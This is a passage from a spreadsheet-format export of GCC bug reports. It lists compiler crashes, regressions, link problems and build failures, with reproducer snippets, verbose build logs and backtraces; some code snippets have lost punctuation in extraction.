The following program should fail to link but with -static it finds the function in libstdc++.a and so crashes:
#include 
extern C
long execute_native_thread_routine(long i long j)
int main()
{
  std::cout &lt;&lt; execute_native_thread_routine(0 0)
}
Variations can be produced with different link order that will produce a multiple definition error which happens with the RHEL devtoolset.
This bug has been present for some time but is made worse in GCC 6 because I renamed execute_native_thread_routine to execute_native_thread_routine_compat and added a different function called execute_native_thread_routine. This means we now have an additional global function in libstdc++.a and the behaviour of the original one changed.</t>
  </si>
  <si>
    <t>GCC-19797</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] g++.dg/abi/inline1.C fails on hppa*-*-hpux*</t>
  </si>
  <si>
    <t>The test g++.dg/abi/inline1.C scan-assembler-not _ZTV1S
fails on hppa{2.0w64}-hp-hpux11.{1123}.  This is a regression
from 3.4.x.</t>
  </si>
  <si>
    <t>GCC-32111</t>
  </si>
  <si>
    <t>[4.3 regression] ICE declaring destructor as friend</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE (segfault) on mainline:
=================================
struct A
{
  friend A::~A() {}
}
=================================
bug.cc:3: error: member functions are implicitly friends of their class
bug.cc: In static member function 'static A::~A()':
bug.cc:3: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Note that ~A is a considered static member function in the second line
of the error message.
Btw the code was wrongly accepted before GCC 4.1.0.</t>
  </si>
  <si>
    <t>GCC-15391</t>
  </si>
  <si>
    <t>-pthread not implicitly generating -lpthread when linking shared object</t>
  </si>
  <si>
    <t>Summary:
    On System A gcc is NOT implicitly generating a reference to -lpthread
    when specifying -pthread when building a shared library.
    On System B gcc DOES implicitly generate a reference to -lpthread
    when specifying -pthread when building a shared library.
Expected Results:
    Specifying -pthread should generate link to -lpthread implicitly on
    System A.
Details:
    The following two blocks of output were generated using
	g++ -v -shared -pthread -o crap crap.cpp
    The first block was generated on System A:
	IBM pSeries running Red Hat Enterprise Server 3.0 AS.
    The second block was generated on System B:
	HP Proliant ML 350 (i386) running Red Hat Enterprise Server 3.0 WS
Both are using the same version of gcc (i.e. that which is installed by
default with RHES 3.0 namely gcc 3.2.3.
===========================================================
System A:
===========================================================
vulcan 145% g++ -v -shared -pthread -o crap crap.cpp
Reading specs from /usr/lib/gcc-lib/ppc64-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --
infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-
checking --with-system-zlib --enable-__cxa_atexit --host=ppc64-redhat-linux --
build=ppc64-redhat-linux --target=ppc64-redhat-linux --with-cpu=default32
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-24)
 /usr/lib/gcc-lib/ppc64-redhat-linux/3.2.3/cc1plus -v -D__GNUC__=3 -
D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -
D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -D_CALL_SYSV -D_BIG_ENDIAN -
D__BIG_ENDIAN__ -Amachine=bigendian -D_ARCH_PPC -DPPC -Dpowerpc -D__PPC__ -
D__ELF__ -D__powerpc__ -D__PPC -D__powerpc -Acpu=powerpc -Amachine=powerpc -
D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=long int -
D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -
Asystem=unix -Asystem=posix -D_REENTRANT crap.cpp -D__GNUG__=3 -D__DEPRECATED -
D__EXCEPTIONS -quiet -dumpbase crap.cpp -version -o /tmp/cc4u8hmR.s
GNU CPP version 3.2.3 20030502 (Red Hat Linux 3.2.3-24) (cpplib) (PowerPC64 
GNU/Linux)
GNU C++ version 3.2.3 20030502 (Red Hat Linux 3.2.3-24) (ppc64-redhat-linux)
        compiled by GNU C version 3.2.3 20030502 (Red Hat Linux 3.2.3-24).
ignoring nonexistent directory /usr/ppc64-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2.3
 /usr/include/c++/3.2.3/ppc64-redhat-linux
 /usr/include/c++/3.2.3/backward
 /usr/local/include
 /usr/lib/gcc-lib/ppc64-redhat-linux/3.2.3/include
 /usr/include
End of search list.
 as -a32 -mppc -V -Qy -o /tmp/ccyUL2pG.o /tmp/cc4u8hmR.s
GNU assembler version 2.14.90.0.4 (ppc-redhat-linux) using BFD version 
2.14.90.0.4 20030523
 /usr/lib/gcc-lib/ppc64-redhat-linux/3.2.3/collect2 --eh-frame-hdr -V -Qy -
shared -m elf32ppclinux -o crap /usr/lib/gcc-lib/ppc64-redhat-
linux/3.2.3/../../../../lib/crti.o /usr/lib/gcc-lib/ppc64-redhat-
linux/3.2.3/crtbeginS.o -L/usr/lib/gcc-lib/ppc64-redhat-linux/3.2.3 -
L/usr/lib/gcc-lib/ppc64-redhat-linux/3.2.3/../../../../lib -L/usr/lib/gcc-
lib/ppc64-redhat-linux/3.2.3/../../.. -L/lib/../lib -
L/usr/lib/../lib /tmp/ccyUL2pG.o -lstdc++ -lm -lgcc_s -lc -lgcc_s /usr/lib/gcc-
lib/ppc64-redhat-linux/3.2.3/crtsavres.o /usr/lib/gcc-lib/ppc64-redhat-
linux/3.2.3/crtendS.o /usr/lib/gcc-lib/ppc64-redhat-
linux/3.2.3/../../../../lib/crtn.o
GNU ld version 2.14.90.0.4 20030523
  Supported emulations:
   elf32ppclinux
   elf32ppc
   elf32ppcsim
   elf64ppc
===========================================================
System B:
===========================================================
drifter.cognos.com 55% g++ -v -shared -pthread -o crap crap.cpp
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --
infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-
checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-24)
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/cc1plus -v -D__GNUC__=3 -
D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -D__ELF__ -
Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -
D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -
D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -
D__tune_i386__ -D_REENTRANT crap.cpp -D__GNUG__=3 -D__DEPRECATED -
D__EXCEPTIONS -quiet -dumpbase crap.cpp -version -o /tmp/ccfgMhMf.s
GNU CPP version 3.2.3 20030502 (Red Hat Linux 3.2.3-24) (cpplib) (i386 
Linux/ELF)
GNU C++ version 3.2.3 20030502 (Red Hat Linux 3.2.3-24) (i386-redhat-linux)
        compiled by GNU C version 3.2.3 20030502 (Red Hat Linux 3.2.3-24).
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2.3
 /usr/include/c++/3.2.3/i386-redhat-linux
 /usr/include/c++/3.2.3/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/include
 /usr/include
End of search list.
 as -V -Qy -o /tmp/ccgmVfZm.o /tmp/ccfgMhMf.s
GNU assembler version 2.14.90.0.4 (i386-redhat-linux) using BFD version 
2.14.90.0.4 20030523
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/collect2 --eh-frame-hdr -m elf_i386 -
shared -o crap /usr/lib/gcc-lib/i386-redhat-
linux/3.2.3/../../../crti.o /usr/lib/gcc-lib/i386-redhat-
linux/3.2.3/crtbeginS.o -L/usr/lib/gcc-lib/i386-redhat-linux/3.2.3 -
L/usr/lib/gcc-lib/i386-redhat-linux/3.2.3/../../.. /tmp/ccgmVfZm.o -lstdc++ -
lm -lgcc_s -lpthread -lc -lgcc_s /usr/lib/gcc-lib/i386-redhat-
linux/3.2.3/crtendS.o /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/../../../crtn.o</t>
  </si>
  <si>
    <t>John.Bossom</t>
  </si>
  <si>
    <t>GCC-1519</t>
  </si>
  <si>
    <t>compiler error while building qt program under rh7.0</t>
  </si>
  <si>
    <t>I cannot build the program when adding a slot and including the .moc fle
internal error 20000116 at class.c line 5102
Release:
2.96  20000731 Red Hat 7.0
Environment:
Red Hat 7.  (Digital Hi Note Pentium ii laptop)
How-To-Repeat:
g++ -save-temps -lqt -slots.cpp -o slots</t>
  </si>
  <si>
    <t>johnspooner</t>
  </si>
  <si>
    <t>GCC-52586</t>
  </si>
  <si>
    <t>libgo fails to build for mips*64-linux-gnu (reference to undefined name 'SYS_GETDENTS64')</t>
  </si>
  <si>
    <t>seen with 4.7.0 rc1 + updates. this is a multilib enabled build the build succeeds for the two 32bit abi's.
complete build log at
https://buildd.debian.org/status/fetch.php?pkg=gcc-4.7&amp;arch=mipsel&amp;ver=4.7.0~rc1-2&amp;stamp=1331693034
need to start a local build ...
/bin/mkdir -p syscall files=`echo ../../../../src/libgo/go/syscall/env_unix.go ../../../../src/libgo/go/syscall/syscall_errno.go ../../../../src/libgo/go/syscall/libcall_support.go ../../../../src/libgo/go/syscall/libcall_posix.go ../../../../src/libgo/go/syscall/socket.go ../../../../src/libgo/go/syscall/sockcmsg_unix.go ../../../../src/libgo/go/syscall/str.go ../../../../src/libgo/go/syscall/syscall.go ../../../../src/libgo/go/syscall/sockcmsg_linux.go ../../../../src/libgo/go/syscall/syscall_unix.go ../../../../src/libgo/go/syscall/exec_unix.go ../../../../src/libgo/go/syscall/exec_linux.go ../../../../src/libgo/go/syscall/libcall_wait4.go ../../../../src/libgo/go/syscall/sleep_select.go ../../../../src/libgo/go/syscall/errstr_linux.go ../../../../src/libgo/go/syscall/libcall_posix_largefile.go ../../../../src/libgo/go/syscall/socket_linux.go epoll.go ../../../../src/libgo/go/syscall/libcall_uname.go ../../../../src/libgo/go/syscall/netlink_linux.go ../../../../src/libgo/go/syscall/lsf_linux.go ../../../../src/libgo/go/syscall/libcall_linux.go libcalls.go sysinfo.go syscall_arch.go runtime.gox sync.gox | sed -e 's/[^ ]*\.gox//g'` /bin/bash ./libtool --tag GO --mode=compile /build/buildd-gcc-4.7_4.7.0~rc1-2-mipsel-ImTNtr/gcc-4.7-4.7.0~rc1/build/./gcc/gccgo -B/build/buildd-gcc-4.7_4.7.0~rc1-2-mipsel-ImTNtr/gcc-4.7-4.7.0~rc1/build/./gcc/ -B/usr/mipsel-linux-gnu/bin/ -B/usr/mipsel-linux-gnu/lib/ -isystem /usr/mipsel-linux-gnu/include -isystem /usr/mipsel-linux-gnu/sys-include      -O2 -g  -mabi=64 -I . -c -fgo-prefix=libgo_syscall -o syscall/syscall.lo $files
libtool: compile:  /build/buildd-gcc-4.7_4.7.0~rc1-2-mipsel-ImTNtr/gcc-4.7-4.7.0~rc1/build/./gcc/gccgo -B/build/buildd-gcc-4.7_4.7.0~rc1-2-mipsel-ImTNtr/gcc-4.7-4.7.0~rc1/build/./gcc/ -B/usr/mipsel-linux-gnu/bin/ -B/usr/mipsel-linux-gnu/lib/ -isystem /usr/mipsel-linux-gnu/include -isystem /usr/mipsel-linux-gnu/sys-include -O2 -g -mabi=64 -I . -c -fgo-prefix=libgo_syscall ../../../../src/libgo/go/syscall/env_unix.go ../../../../src/libgo/go/syscall/syscall_errno.go ../../../../src/libgo/go/syscall/libcall_support.go ../../../../src/libgo/go/syscall/libcall_posix.go ../../../../src/libgo/go/syscall/socket.go ../../../../src/libgo/go/syscall/sockcmsg_unix.go ../../../../src/libgo/go/syscall/str.go ../../../../src/libgo/go/syscall/syscall.go ../../../../src/libgo/go/syscall/sockcmsg_linux.go ../../../../src/libgo/go/syscall/syscall_unix.go ../../../../src/libgo/go/syscall/exec_unix.go ../../../../src/libgo/go/syscall/exec_linux.go ../../../../src/libgo/go/syscall/libcall_wait4.go ../../../../src/libgo/go/syscall/sleep_select.go ../../../../src/libgo/go/syscall/errstr_linux.go ../../../../src/libgo/go/syscall/libcall_posix_largefile.go ../../../../src/libgo/go/syscall/socket_linux.go epoll.go ../../../../src/libgo/go/syscall/libcall_uname.go ../../../../src/libgo/go/syscall/netlink_linux.go ../../../../src/libgo/go/syscall/lsf_linux.go ../../../../src/libgo/go/syscall/libcall_linux.go libcalls.go sysinfo.go syscall_arch.go  -fPIC -o syscall/.libs/syscall.o
../../../../src/libgo/go/syscall/libcall_linux.go:206:26: error: reference to undefined name 'SYS_GETDENTS64'
make[10]: *** [syscall/syscall.lo] Error 1
make[10]: Leaving directory `/build/buildd-gcc-4.7_4.7.0~rc1-2-mipsel-ImTNtr/gcc-4.7-4.7.0~rc1/build/mipsel-linux-gnu/64/libgo'
make[9]: *** [all-recursive] Error 1</t>
  </si>
  <si>
    <t>GCC-77421</t>
  </si>
  <si>
    <t>Bugs found in GCC with the help of PVS-Studio</t>
  </si>
  <si>
    <t>Hello. I've got to the GCC code and checked it with PVS-Studio analyzer. There are some suspicious code fragments described in the article:
http://www.viva64.com/en/b/0425/
I hope it will help to fix several of them.</t>
  </si>
  <si>
    <t>karpov</t>
  </si>
  <si>
    <t>GCC-30110</t>
  </si>
  <si>
    <t>classpath external missing from src.zip</t>
  </si>
  <si>
    <t>The source from classpath/external is missing from the libgcj src.zip.</t>
  </si>
  <si>
    <t>GCC-64906</t>
  </si>
  <si>
    <t>-fsanitize=integer-divide-by-zero creates false -Wmaybe-uninitialized warning</t>
  </si>
  <si>
    <t>This testcase produces a false warning when compiled with -O2 -fsanitize=integer-divide-by-zero -Wmaybe-uninitialized:
struct s {
    __SIZE_TYPE__ size
    unsigned int flags
}
int testf(struct s * source)
{
    __SIZE_TYPE__ msize = 0
    if ((source-&gt;flags &amp; 88) ? (__SIZE_TYPE__) 43 * 8 : 0)
        msize = source-&gt;size / ((source-&gt;flags 
    return msize
}
test.c: In function 'testf':
test.c:11:8: warning: 'iftmp.1' may be used uninitialized in this function [-Wmaybe-uninitialized]
  msize = source-&gt;size / ((source-&gt;flags 
        ^</t>
  </si>
  <si>
    <t>GCC-7410</t>
  </si>
  <si>
    <t xml:space="preserve"> Yes it fixed it
 test results: http://gcc.gnu.org/ml/gcc-
 testresults/2002-07/msg00719.html
 The same as the one before: http://gcc.gnu.org/ml/gcc-
 testresults/2002-07/msg00697.html
 Thanks
 Andrew Pinski
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-14211</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 Regression] const_cast returns lvalue but should be rvalue</t>
  </si>
  <si>
    <t>// Given the following C++ code
void f( char * str)
{
	char * 
}
/*
then g++ 332 says not a lot.
[dcb@localhost src]$ ~/gnu/gcc332/results/bin/g++ -c -g -O2 -Wall -ansi
-pedantic cc.cc
cc.cc: In function `void f(char*)':
cc.cc:7: warning: unused variable `char*&amp;m'
[dcb@localhost src]$
But Intel C++ 8.0 says
[dcb@localhost src]$ icc cc.cc
cc.cc(7): error: initial value of reference to non-const must be an lvalue
        char * 
                     ^
compilation aborted for cc.cc (code 2)
[dcb@localhost src]$
One compiler must be wrong. 
*/</t>
  </si>
  <si>
    <t>d.binderman</t>
  </si>
  <si>
    <t>GCC-66633</t>
  </si>
  <si>
    <t>[5/6 regression] ICE on valid verify_gimple failed with OpenMP</t>
  </si>
  <si>
    <t>The following causes an ICE in gfortran 6.0.0 (r224761):
module spls
  type :: spc
   contains
     procedure :: l =&gt; spcL
  end type spc
contains
  function spl()
    class(spc) pointer :: spc_
    !$omp parallel
    write (0*) igrt(fli)
    !$omp end parallel
  contains
    double precision function fli()
      fli=spc_%l()
    end function fli
  end function spl
  double precision function spcL(s)
    implicit none
    class(spc) intent(inout) :: s
    return
  end function spcL
end module spls
$ gfortran -v
Using built-in specs.
COLLECT_GCC=/opt/gcc-trunk/bin/gfortran
COLLECT_LTO_WRAPPER=/opt/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/opt/gcc-trunk --enable-languages=cc++fortran --disable-multilib
Thread model: posix
gcc version 6.0.0 20150622 (experimental) (GCC) 
 gfortran -c tmp.F90 -o tmp.o -fopenmp
tmp.F90:11:0:
     write (0*) igrt(fli)
^
Error: invalid argument to gimple call
&amp;&gt;&gt;.fli
D.3429 = __builtin_adjust_trampoline (
tmp.F90:11:0: internal compiler error: verify_gimple failed
0xbaf19d verify_gimple_in_seq(gimple_statement_base*)
        ../../gcc-trunk/gcc/tree-cfg.c:4790
0xab14b0 execute_function_todo
        ../../gcc-trunk/gcc/passes.c:1987
0xab1c63 execute_todo
        ../../gcc-trunk/gcc/passes.c:2042
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-5963</t>
  </si>
  <si>
    <t>gcc won't temrminate with simple source</t>
  </si>
  <si>
    <t>gcc-3.0.5 (prerelease) will not terminate if fed with the 
following code lines: (Note the missing `)Â´ in line 3.)
-------------------------
struct A
{
 int foo8(int x)    {  return(foo16(x)  }
 int foo16(int x)
}
--------------------------------
bash# /usr/bin/time gcc -c loop.cc -o loop.o
loop.cc: In member function `int A::foo8(int)':
loop.cc:3: parse error before `' token
Command terminated by signal 2
0.00user 0.00system 1:02.61elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (111major+31minor)pagefaults 0swaps
[Terminated by ^C after 1 minute on a fairly new 
Athlon system. NOTE: cc1plus is consuming 100% CPU but 
gcc 0% so `timeÂ´ reports `0%CPUÂ´.]
Release:
gcc-3.0.5 (prerelease)
Environment:
Linux i386
How-To-Repeat:
see above</t>
  </si>
  <si>
    <t>GCC-46759</t>
  </si>
  <si>
    <t>incorrect array bounds warning?</t>
  </si>
  <si>
    <t>Created attachment 22598
small reproducer
Linux theta.lbl.gov 2.6.35.6-48.fc14.x86_64 #1 SMP Fri Oct 22 15:36:08 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
g++ (GCC) 4.5.1 20100924 (Red Hat 4.5.1-4)
g++ -Wall -O1 ~/bounds_warning.cpp # no warning
g++ -Wall -O2 ~/bounds_warning.cpp
bounds_warning.cpp: In function 'int main()':
bounds_warning.cpp:21:14: warning: array subscript is above array bounds
I stared at this for a while but couldn't find a problem with my code.
Is there maybe a problem with the optimizer?
Unfortunately I've been unable to bootstrap the 4.5 branch or the trunk.
Could someone try out the attached reproducer against the current svn
of the branch/trunk?</t>
  </si>
  <si>
    <t>GCC-47127</t>
  </si>
  <si>
    <t>gcc.dg/graphite/id-14.c ICEs with cloog-parma</t>
  </si>
  <si>
    <t>Currently the gcc.dg/graphite/id-14.c test case causes an ICE when gcc trunk is built against ppl 0.11 and the pre-release cloog-parma 0.16 at both -m32 and -m64. This crash is of the form...
/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/ /sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20101229/gcc/testsuite/gcc.dg/graphite/id-14.c   -O2 -fgraphite-identity -ffast-math -S  -m32 -o id-14.s
/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20101229/gcc/testsuite/gcc.dg/graphite/id-14.c: In function 'foo':
/sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20101229/gcc/testsuite/gcc.dg/graphite/id-14.c:7:1: internal compiler error: Segmentation fault
and backtraces as...
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000000
Parma_Polyhedra_Library::Constraint_System::insert (this=0x7fff5fbfe720 c=@0x0) at ../../src/Constraint_System.cc:243
243	  if (topology() == c.topology())
(gdb) bt
#0  Parma_Polyhedra_Library::Constraint_System::insert (this=0x7fff5fbfe720 c=@0x0) at ../../src/Constraint_System.cc:243
#1  0x000000014185dcb6 in Parma_Polyhedra_Library::Polyhedron::Polyhedron (this=0x7fff5fbfe720 topol=Parma_Polyhedra_Library::NECESSARILY_CLOSED num_dimensions=1 kind=) at Constraint_System.inlines.hh:183
#2  0x000000014145ce88 in Determinate [inlined] () at ppl.hh:37971
#3  Determinate [inlined] () at /sw/src/fink.build/ppl9-0.11-2/ppl-0.11/build/src/ppl.hh:77017
#4  0x000000014145ce88 in Parma_Polyhedra_Library::Pointset_Powerset::Pointset_Powerset (this=0x141b33ed0 num_dimensions=1 kind=) at ppl.hh:80008
#5  0x0000000141452d2f in ppl_new_Pointset_Powerset_C_Polyhedron_from_space_dimension (pph=0x141b2e850 d=1 empty=0) at ppl_c_Pointset_Powerset_C_Polyhedron.cc:75
#6  0x000000010050c122 in build_poly_scop (scop=0x141b2e820) at ../../gcc-4.6-20101229/gcc/graphite-sese-to-poly.c:913
Current language:  auto currently c++
Using built-in specs.
COLLECT_GCC=gcc-4
COLLECT_LTO_WRAPPER=/sw/lib/gcc4.6/libexec/gcc/x86_64-apple-darwin10.5.0/4.6.0/lto-wrapper
Target: x86_64-apple-darwin10.5.0
Configured with: ../gcc-4.6-20101229/configure --prefix=/sw --prefix=/sw/lib/gcc4.6 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.6/info --enable-languages=cc++fortranobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.6 --enable-checking=yes --enable-cloog-backend=ppl
Thread model: posix
gcc version 4.6.0 20101229 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-70839</t>
  </si>
  <si>
    <t>[5/6/7 regression] Every libjava execution test FAILs: Incorrect library ABI version detected</t>
  </si>
  <si>
    <t>Created attachment 38355
proposed patch
Since the 6.1.0 release every single libjava execution test FAILs everywhere
(seen on Solaris/x86 Linux/x86_64 and Darwin/x86):
libgcj failure: gcj linkage error.
Incorrect library ABI version detected.  Aborting.
The message is from libjava/java/lang/natClassLoader.cc (_Jv_CheckABIVersion)
which (on i386-pc-solaris2.12) is called like this:
#0  _Jv_CheckABIVersion (value=1074342824)
    at /vol/src/gnu/gcc/gcc-6.1.0/libjava/java/lang/natClassLoader.cc:271
#1  0xffff80ffbde0b47d in _Jv_RegisterClasses (
    classes=0xffff80ffbeced688 )
    at /vol/src/gnu/gcc/gcc-6.1.0/libjava/java/lang/natClassLoader.cc:293
#2  0xffff80ffbddc553a in frame_dummy ()
   from /var/gcc/gcc-6.1.0/12-gcc-gas/i386-pc-solaris2.12/amd64/libjava/.libs/libgcj.so.17
#3  0xffff80ffbf630288 in call_array () from /lib/amd64/ld.so.1
#4  0xffff80ffbf630414 in call_init () from /lib/amd64/ld.so.1
#5  0xffff80ffbf62f3b0 in setup () from /lib/amd64/ld.so.1
#6  0xffff80ffbf6425f7 in _setup () from /lib/amd64/ld.so.1
#7  0xffff80ffbf62131e in _rt_boot () from /lib/amd64/ld.so.1
The version == GCJ_CXX_ABI_VERSION test fails: the latter is (from
libjava/include/jvm.h)
#define GCJ_CXX_ABI_VERSION (__GNUC__ * 100000)
Before the release version was 600000 since then it's 601000.
In libjava/java/lang/natClassLoader.c (_Jv_RegisterClasses) we have
     _Jv_CheckABIVersion ((unsigned long) klass-&gt;next_or_version)
where klass-&gt;next_or_version is set in gcc/java/class.c (make_class_data):
  PUSH_FIELD_VALUE (v2 next_or_version gcj_abi_version)
Ultimately gcc/java/decl.c (parse_version) sets gcj_abi_version from
version_string and still extracts the minor version while this libjava
change
2016-01-03  Matthias Klose  
        * libtool-version: Bump soversion.
        * include/jvm.h (GCJ_CXX_ABI_VERSION): Don't encode __GNUC_MINOR__.
doesn't expect the minor version any longer.
The attached patch gets rid of the minor version in jc1 too and seems to fix
the errors (x86_64-apple-darwin15.5.0 libjava make check still running).
  Rainer</t>
  </si>
  <si>
    <t>GCC-10305</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE in int_for_mode</t>
  </si>
  <si>
    <t>The ICE does not happen when the forward declaration of SCKeyEntry is
replaced by the definition.
Release:
3.3 20030403 (prerelease)
Environment:
System: Linux sykes 2.4.20 #1 Fri Mar 21 15:25:36 UTC 2003 ia64 unknown unknown GNU/Linux
Architecture: ia64
host: ia64-suse-linux-gnu
build: ia64-suse-linux-gnu
target: ia64-suse-linux-gnu
configured with: /cvs/branch/gcc/configure --host=ia64-suse-linux --enable-threads=posix --prefix=/usr --with-slibdir=/lib --with-system-zlib --enable-shared : (reconfigured)  : (reconfigured)
How-To-Repeat:
$ cat int_for_mode.cc
class ShortCutKey
struct SCKeyEntry
class SCKeyTable {
public:
  void AddSCKey(unsigned long sym unsigned int modifier int fn)
}
extern SCKeyEntry scMenuKey[]
extern const int MenuKeyNum
extern SCKeyTable* menuKey
struct SCKeyEntry {
  unsigned long sym
  unsigned int mod
  int func
}
void InitQvwm()
{
  menuKey-&gt;AddSCKey(scMenuKey[0].sym scMenuKey[0].mod scMenuKey[0].func)
}
$ ./xgcc -B./ -O2 -v int_for_mode.cc 
Reading specs from ./specs
Configured with: /cvs/branch/gcc/configure --host=ia64-suse-linux --enable-threads=posix --prefix=/usr --with-slibdir=/lib --with-system-zlib --enable-shared : (reconfigured)  : (reconfigured) 
Thread model: posix
gcc version 3.3 20030403 (prerelease)
 ./cc1plus -quiet -v -iprefix ./../lib/gcc-lib/ia64-suse-linux/3.3/ -isystem ./include -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE int_for_mode.cc -D__GNUG__=3 -quiet -dumpbase int_for_mode.cc -auxbase int_for_mode -O2 -version -o /tmp/ccYhG5Ep.s
GNU C++ version 3.3 20030403 (prerelease) (ia64-suse-linux)
        compiled by GNU C version 3.3 20030226 (prerelease) (SuSE Linux).
GGC heuristics: --param ggc-min-expand=97 --param ggc-min-heapsize=126704
ignoring nonexistent directory ../lib/gcc-lib/ia64-suse-linux/3.3/../../../../include/c++/3.3
ignoring nonexistent directory ../lib/gcc-lib/ia64-suse-linux/3.3/../../../../include/c++/3.3/ia64-suse-linux
ignoring nonexistent directory ../lib/gcc-lib/ia64-suse-linux/3.3/../../../../include/c++/3.3/backward
ignoring nonexistent directory ../lib/gcc-lib/ia64-suse-linux/3.3/include
ignoring nonexistent directory ../lib/gcc-lib/ia64-suse-linux/3.3/../../../../ia64-suse-linux/include
ignoring nonexistent directory /usr/include/c++/3.3
ignoring nonexistent directory /usr/include/c++/3.3/ia64-suse-linux
ignoring nonexistent directory /usr/include/c++/3.3/backward
#include ... search starts here:
#include  search starts here:
 include
 /usr/local/include
 /usr/lib/gcc-lib/ia64-suse-linux/3.3/include
 /usr/ia64-suse-linux/include
 /usr/include
End of search list.
int_for_mode.cc: In function `void InitQvwm()':
int_for_mode.cc:17: internal compiler error: in int_mode_for_mode at 
   stor-layout.c:295
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-20965</t>
  </si>
  <si>
    <t>[4.1 Regression] GCC can no longer build itself on ppc-darwin</t>
  </si>
  <si>
    <t>This shows up as the following regression in the testsuite:
native gcc.sum gcc.c-torture/compile/20030921-1.c
native gcc.sum gcc.c-torture/compile/20040909-1.c
See: .</t>
  </si>
  <si>
    <t>GCC-22259</t>
  </si>
  <si>
    <t>[4.1 Regression] spawnv cannot execute gcc/as</t>
  </si>
  <si>
    <t>Building gcc on i686-pc-mingw32 fails with:
/home/FX/ibin/./gcc/xgcc -B/home/FX/ibin/./gcc/ -B/mingw/i686-pc-mingw32/bin/
-B/mingw/i686-pc-mingw32/lib/ -isystem /mingw/i686-pc-mingw32/include -isystem
/mingw/i686-pc-mingw32/sys-include -O2 -I../../gcc/gcc/../winsup/w32api/include
-DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-Wold-style-definition  -isystem ./include   -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2
-D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/.
-I../../gcc/gcc/../include -I./../intl -I../../gcc/gcc/../libcpp/include 
-DL_chkstk -xassembler-with-cpp -c ../../gcc/gcc/config/i386/cygwin.asm -o
libgcc/./_chkstk.o
executable: C:/msys/1.0/home/FX/ibin/gcc/cc1.exe
executable: C:/msys/1.0/home/FX/ibin/gcc/as
xgcc.exe: _spawnv: No such file or directory
[lines beginning with executable: are debug statements printing the executable
argument to pex_win32_exec_child in libiberty/pex-win32.c]
In fact xgcc cannot be used. It tries to execute gcc/cc1.exe which works fine
then gcc/as. gcc/as is a script and not a real win32 executable program. Thus
the spawn fails.
I don't know when this stopped to work. Seems that before the assembler was
called directly and not by this script. Does someone know when this changed and
does someone have an idea on how to fix this?</t>
  </si>
  <si>
    <t>GCC-61884</t>
  </si>
  <si>
    <t>[5 Regression] g++.dg/ipa/pr61085.C FAILs with -Os</t>
  </si>
  <si>
    <t>Created attachment 33174
preprocessed source (g++.dg/ipa/pr61085.C)
Output:
$ g++ -Os pr61085.ii
$ ./a.out
Aborted
valgrind doesn't output any errors
Tested revisions:
4.10 r212913 - FAIL
4.9 r212703 - OK
4.8 r212702 - OK</t>
  </si>
  <si>
    <t>GCC-71906</t>
  </si>
  <si>
    <t>[6/7 Regression] Fortran allocatable strings debug info type size regression</t>
  </si>
  <si>
    <t>Description of problem:
Some GDB testcases started to failing gcc-5.3.1 -&gt; gcc-6.1.1.
Version-Release number of selected component (if applicable):
PASS: gcc-5.3.1-2.fc23.x86_64
FAIL: gcc-6.1.1-3.fc24.x86_64
